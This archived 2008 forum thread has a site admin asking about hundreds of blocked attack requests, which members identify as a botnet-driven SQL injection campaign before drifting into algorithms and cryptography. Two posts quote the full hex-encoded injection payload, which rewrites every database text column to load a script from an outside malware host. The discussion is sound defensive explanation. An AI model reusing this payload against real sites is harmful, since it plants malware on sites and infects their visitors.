Welcome, Guest. Please Login
 
  HomeHelpSearchLogin FAQ Radified Ghost.Classic Ghost.New Bootable CD Blog  
 
Page Index Toggle Pages: 1
Send Topic Print
Scripting Abuse Detected: Guardian (Read 28971 times)
Rad
Radministrator
*****
Offline


Sufferin' succotash

Posts: 4090
Newport Beach, California


Back to top
Scripting Abuse Detected: Guardian
Aug 8th, 2008 at 11:12pm
 
Been getting lots of these notices (several hundred) the last few days:

Quote:
Scripting Abuse Detected! on Today at 10:09pm

Abusing user ID (Real Name): Guest -> ()
Abuse detected from IP: 122.231.132.86
Blocked script in Url data: cast(0x4445434c415245204054207661726368617228323535292c4043207661726368617228343
0303029204445434c415245205461626c655f437572736f7220435552534f5220464f522073656c6
5637420612e6e616d652c622e6e616d652066726f6d207379736f626a6563747320612c737973636
f6c756d6e73206220776865726520612e69643d622e696420616e6420612e78747970653d2775272
0616e642028622e78747970653d3939206f7220622e78747970653d3335206f7220622e787479706
53d323331206f7220622e78747970653d31363729204f50454e205461626c655f437572736f72204
645544348204e4558542046524f4d20205461626c655f437572736f7220494e544f2040542c40432
05748494c4528404046455443485f5354415455533d302920424547494e206578656328277570646
17465205b272b40542b275d20736574205b272b40432b275d3d5b272b40432b275d2b2727223e3c2
f7469746c653e3c736372697074207372633d22687474703a2f2f73646f2e313030306d672e636e2
f63737273732f772e6a73223e3c2f7363726970743e3c212d2d272720776865726520272b40432b2
7206e6f74206c696b6520272725223e3c2f7469746c653e3c736372697074207372633d226874747
03a2f2f73646f2e313030306d672e636e2f63737273732f772e6a73223e3c2f7363726970743e3c2
12d2d272727294645544348204e4558542046524f4d20205461626c655f437572736f7220494e544
f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f4341544
5205461626c655f437572736f72 as char(4000))

Radified Community Forums, The Guardian

Any idea what's up with that? And what I can do about it?
I traced out the IPs and they come from all over the planet.
 
WWW  
IP Logged
 

Rad
Radministrator
*****
Offline


Sufferin' succotash

Posts: 4090
Newport Beach, California


Back to top
Re: Scripting Abuse Detected: Guardian
Reply #1 - Aug 8th, 2008 at 11:13pm
 
Here's another:

Quote:
Scripting Abuse Detected! on Today at 9:56pm

Abusing user ID (Real Name): Guest -> ()
Abuse detected from IP: 61.158.77.50
Blocked script in Url data: cast(0x4445434c415245204054207661726368617228323535292c4043207661726368617228343
0303029204445434c415245205461626c655f437572736f7220435552534f5220464f522073656c6
5637420612e6e616d652c622e6e616d652066726f6d207379736f626a6563747320612c737973636
f6c756d6e73206220776865726520612e69643d622e696420616e6420612e78747970653d2775272
0616e642028622e78747970653d3939206f7220622e78747970653d3335206f7220622e787479706
53d323331206f7220622e78747970653d31363729204f50454e205461626c655f437572736f72204
645544348204e4558542046524f4d20205461626c655f437572736f7220494e544f2040542c40432
05748494c4528404046455443485f5354415455533d302920424547494e206578656328277570646
17465205b272b40542b275d20736574205b272b40432b275d3d5b272b40432b275d2b2727223e3c2
f7469746c653e3c736372697074207372633d22687474703a2f2f73646f2e313030306d672e636e2
f63737273732f772e6a73223e3c2f7363726970743e3c212d2d272720776865726520272b40432b2
7206e6f74206c696b6520272725223e3c2f7469746c653e3c736372697074207372633d226874747
03a2f2f73646f2e313030306d672e636e2f63737273732f772e6a73223e3c2f7363726970743e3c2
12d2d272727294645544348204e4558542046524f4d20205461626c655f437572736f7220494e544
f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f4341544
5205461626c655f437572736f72 as char(4000))

Radified Community Forums, The Guardian

It's the same character string, from different IPs.
 
WWW  
IP Logged
 
Nigel Bree
Ex Member




Back to top
Re: Scripting Abuse Detected: Guardian
Reply #2 - Aug 8th, 2008 at 11:40pm
 
It's a form of SQL injection attack; the script itself (the "cast" and such) is a small piece of SQL, and the attackers are trying to probe and see if any web-facing sites pass the content to a back-end database which will execute it. Inside that - the character data wrapped inside the "cast" - is another piece of script that is the next stage of payload and tries to modify all the tables.

This is just a kind of attack that's become flavour of the month, it's been hitting a lot of sites over the last couple months (typical discussion e.g. at http://sqlblog.com/blogs/denis_gobo/archive/2008/06/25/7491.aspx) especially a lot of forums.

There's probably not anything you can do about it, since they will most likely be originated from compromised machines in botnets, and your system is catching them anyway.
 
 
IP Logged
 
Rad
Radministrator
*****
Offline


Sufferin' succotash

Posts: 4090
Newport Beach, California


Back to top
Re: Scripting Abuse Detected: Guardian
Reply #3 - Aug 18th, 2008 at 3:15pm
 
Quote:
see if any web-facing sites pass the content to a back-end database which will execute it.

YaBB does not use a database. (It's all Perl-based, not PHP+MySQL like most forums, so the attack does not seem very inteligent.) Lack of database sppt has actually been one of YaBB's biggest negatives. YaBB 3.0 will be the first version to support databases .. if they ever finish.

I have started banning IPs. Have banned maybe 50 or 100. Here's the latest: 67.242.22.100. Normally between 2 and 6 attacks per IP. Rarely more. I am wondering if this is really from a small number of PCs using IP spoofing. And how I might tell. (You would know, I'm sure.)

The attack continues, tho seems to be waning. Only 50 attacks today. I get an email for every one. Lotsa emails to delete.
 
WWW  
IP Logged
 
MrMagoo
Übermensch
*****
Offline


Resident Linux Guru

Posts: 1026
Phoenix, AZ (USA)


Back to top
Re: Scripting Abuse Detected: Guardian
Reply #4 - Aug 18th, 2008 at 9:22pm
 
$ nslookup 67.242.22.100
Server:         10.249.60.17
Address:        10.249.60.17#53

Non-authoritative answer:
100.22.242.67.in-addr.arpa      name = cpe-67-242-22-100.twcny.res.rr.com.

That particular IP address belongs to a Road Runner (Time Warner Cable Internet) customer.  This leads me to believe the attacks are coming from infected PC's behind dynamic IP addresses.  If that is the case, blocking IP's will be marginally effective.  These computers are probably part of a large bot-net someone is using to try to take over web sites.

IP Spoofing isn't really necessary in this case.  They don't need to hide where they are coming from since they are coming out infected computers participating in a bot-net rather than the attackers using their own computers. 

It also isn't very likely they are spoofing their IPs.  If they sent you a packet with a fake IP, your web server would try to respond to that packet by sending a reply to the spoofed IP.  Since it is spoofed, the computer that gets that reply won't respond to it since it didn't send the original packet.  So, 2-way communication cannot take place with a spoofed IP.  Since HTTP runs on TCP, and TCP requires 2-way communication, I don't think it is technically possible to spoof the IP in this case.

Spoofing can happen in communication streams that don't require 2-way communication.  UDP is one protocol that doesn't require 2-way communication.  DNS and DHCP both utilize UDP, and therefore could be (and often are during attacks) spoofed.
 
WWW  
IP Logged
 
Rad.Test
Technoluster
***
Offline


Rad's non-Admin test-profile
in Firefox

Posts: 108


Back to top
Re: Scripting Abuse Detected: Guardian
Reply #5 - Aug 18th, 2008 at 10:14pm
 
MrMagoo wrote on Aug 18th, 2008 at 9:22pm:
If that is the case, blocking IP's will be marginally effective.

why only marginally? and why attack a forum that is known to have no database with a sql attack?

this security stuff is interesting.

here is all blocked ip's:

Code:
71.221.152.83
123.187.143.122
166.82.17.60
218.93.188.87
124.132.208.60
218.208.124.130
118.167.70.29
200.104.87.71
98.28.106.213
84.155.204.181
189.159.27.109
80.200.32.39
151.204.61.226
24.242.242.122
12.144.73.250
72.86.76.182
220.113.89.24
12.144.73.250
65.191.42.241
84.84.18.20
24.19.189.108
68.32.49.143
69.231.149.194
77.41.89.81
220.174.102.252
219.154.206.13
70.169.193.27
116.23.41.91
219.147.65.252
219.130.69.146
125.82.219.95
119.11.80.198
59.42.221.50
24.125.66.161
221.207.164.97
117.200.241.233
220.129.137.122
61.227.22.23
220.246.95.145
189.205.182.218
189.205.182.218
203.218.6.47
91.140.79.71
116.226.82.23
218.93.188.87
121.16.192.197
218.208.124.130
123.187.143.122
222.107.215.85
123.192.170.186
71.221.152.83
60.179.254.43
24.103.46.33
58.33.32.149
220.212.236.73
121.167.39.171
76.127.185.65
121.16.216.196
76.127.185.65
124.132.146.114
61.229.54.35
92.20.1.186
99.224.20.34
90.5.66.176
76.205.95.85
61.18.170.16
76.179.218.112
83.167.100.9
203.162.3.155
24.188.204.84
207.59.128.42
61.18.170.1
61.18.170.240
121.167.39.171
60.221.11.110
76.172.51.182
75.21.229.216
12.72.73.76
84.226.15.172
60.221.11.110
200.106.98.93
222.80.164.231
98.199.3.96
96.240.54.80
24.166.24.234
69.105.59.154
202.64.34.144
75.248.74.120
71.142.54.100
68.46.25.73
69.73.82.227
75.85.132.208
151.197.183.213
98.176.45.250
70.50.231.215
70.181.87.6
209.30.133.21
83.63.223.8
68.57.210.241
98.221.0.108
68.191.106.251
76.190.213.99
66.69.149.149
190.160.118.199
69.105.59.154
82.143.237.110
201.214.32.144
67.242.22.100
217.136.120.128
72.54.200.137
76.252.189.158
85.179.145.238
24.228.56.111
84.193.173.155
97.82.229.156
 
 
IP Logged
 

Nigel Bree
Ex Member




Back to top
Re: Scripting Abuse Detected: Guardian
Reply #6 - Aug 19th, 2008 at 12:42am
 
Rad.Test wrote on Aug 18th, 2008 at 10:14pm:
why only marginally?

Because those launching such wide-scale automated attacks have a truly enormous number of compromised machines to launch them from.

Quote:
and why attack a forum that is known to have no database with a sql attack?

Because they don't know that. The typical way such automated attacks select victims is via Web indexes like Google; they are mostly looking for anything indexed with URLs that match certain patterns that are suggestive of scripts which *might* have a database back end.

Essentially, these kinds of scripts are written with quite simple positive-match rules; since those who launch these kinds of attacks have enormous distributed computing power at their disposal, it costs them nothing to launch these probes relatively indiscriminately. The authors of the scripts that direct the compromised machines don't need to bother carefully crafting their patterns to only select vulnerable targets; anything that is vaguely similar will do, since it costs them nothing to try.

Quote:
this security stuff is interesting.

Meh. Less so than you'd think, honestly. It's fun to break badly-designed systems, and guys like Peter Gutmann certainly can make it sound fun, but when you're on the inside having to design systems that are proof against various kinds of attack it's mostly deathly dull, and the politics and paperwork requirements are soul-destroying.
 
 
IP Logged
 
Nigel Bree
Ex Member




Back to top
Re: Scripting Abuse Detected: Guardian
Reply #7 - Aug 19th, 2008 at 8:32pm
 
Actually, I should qualify that. Some of the math in cryptography is insanely beautiful. Taking the time to develop a full appreciation for the elegance of it and all the supporting structure is well worth it.

[ For that, it's good to be familiar with second-year college linear algebra to get up to speed with the basics of fields, groups, and rings (and vector spaces) and how many unusual systems can be built using the same techniques as Peano arithmetic but with different twists. ]

Then, grab a good standard undergraduate text like Cormen/Lieserson/Rivest. One of the real pleasures of this particular text is the chapter where none other than Ron Rivest himself guides you through both the number theory (albeit rapidly) and algorithms of the RSA cryptosystem.

This particular book is a great companion to Knuth's work since it not only covers some different areas and is more accessible, but retains the same real joy which is located in the exercises. Reading Knuth without doing the exercises is missing half the story, and it's the same here. It's also one of the few undergraduate-level texts ever written which covers important topics like splay trees and binomial heaps, to say nothing of the graph-theoretic chapters which as I've noted before really do matter.
 
 
IP Logged
 
Rad
Radministrator
*****
Offline


Sufferin' succotash

Posts: 4090
Newport Beach, California


Back to top
Re: Scripting Abuse Detected: Guardian
Reply #8 - Aug 22nd, 2008 at 11:27pm
 
the cormon/rivest book, tho published 2001, currently has an amazon sales rank of 827, which is one of the lowest i've ever seen, meaning, it's still selling very strongly.

Quote:
it's good to be familiar with second-year college linear algebra  

never had linear algebra, cuz my degree didn't require more than 2 semesters calculus. i am v. strong in regular algebra. (would that be non-linear?)

as i understand it, this sql injection attack asks for database info. so i don't understand why i would get ~50 such attacks from same ip (220.136.2.233) in 1 or 2 minutes.

after the first 1 or two return no results, wouldn't the attacking source move on?

Quote:
Algorithm Complexity: you need to know Big-O. It's a must. If you struggle with basic big-O complexity analysis, then you are almost guaranteed not to get hired. It's, like, one chapter in the beginning of one theory of computation book, so just go read it. You can do it.

Big post. Could be a small book.
 
WWW  
IP Logged
 
Nigel Bree
Ex Member




Back to top
Re: Scripting Abuse Detected: Guardian
Reply #9 - Aug 23rd, 2008 at 1:06am
 
Rad wrote on Aug 22nd, 2008 at 11:27pm:
after the first 1 or two return no results, wouldn't the attacking source move on?

Normally, you'd expect so, but remember that most malicious code isn't exactly well-written or well-tested (going all the way back to Robert T. Morris and the original Internet Worm). Many of the negative effects of malicious code like viruses (which are first and foremost designed to propagate) tend to just be bugs in them, not intentional.

 
 
IP Logged
 
Nigel Bree
Ex Member




Back to top
Re: Scripting Abuse Detected: Guardian
Reply #10 - Aug 23rd, 2008 at 2:42am
 
Rad wrote on Aug 22nd, 2008 at 11:27pm:
i am v. strong in regular algebra. (would that be non-linear?)

Mostly, yeah. "Regular" algebra mostly involves solving systems of equations with polynomials, which isn't "linear" because most of the unknown terms have been raised to some power, and the results you're mostly looking for are numbers on the real line.

Linear algebra is mostly about vectors and matrices - those can be considered polynomials too, but they have what is called an orthogonal basis - the basis are vectors that point in different directions, and thus form a space with >1 dimension. For instance, 1 and i form the basis of the complex plane.
 
 
IP Logged
 
Page Index Toggle Pages: 1
Send Topic Print